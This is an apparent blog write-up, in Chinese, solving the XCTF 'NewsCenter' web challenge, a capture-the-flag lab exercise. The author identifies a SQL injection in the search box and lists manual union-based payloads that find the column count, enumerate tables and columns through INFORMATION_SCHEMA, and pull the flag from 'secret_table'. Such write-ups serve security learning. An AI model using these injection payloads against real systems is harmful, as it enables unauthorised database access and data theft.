XCTF Web 高手区007: NewsCenter

题目:
XCTF Web 高手区007: NewsCenter_第1张图片

WP:
打开场景看到 search news的字样,只能输入进行操作
预测是一道SQL注入的题目
XCTF Web 高手区007: NewsCenter_第2张图片

本题最直接的方法是sqlmap爆一下数据库
然而我对sqlmap的使用并不擅长
大家可以去看看这位大佬yangker12148的WP

我这里用的是简单的手动输入(原因很简单,近期在学数据库sql,就现学现用了)
输入 ' and 0 union select 1#进行字段长度的推测
XCTF Web 高手区007: NewsCenter_第3张图片

' and 0 union select 1,2#

XCTF Web 高手区007: NewsCenter_第4张图片

' and 0 union select 1,2,3 #

XCTF Web 高手区007: NewsCenter_第5张图片
下面用

' and 0 union 
select 1,TABLE_SCHEMA,TABLE_NAME 
from INFORMATION_SCHEMA.COLUMNS #

查询库中所有表
XCTF Web 高手区007: NewsCenter_第6张图片
secret_table?答案不在这还能在哪?
使用

' and 0 union select 1,column_name,data_type from 
information_schema.columns 
where table_name='secret_table'#

XCTF Web 高手区007: NewsCenter_第7张图片
一个熟悉的身影:fl4g
直接查询

' and 0 union select 1,2,fl4g from secret_table #

XCTF Web 高手区007: NewsCenter_第8张图片
成功

你可能感兴趣的:(CTF)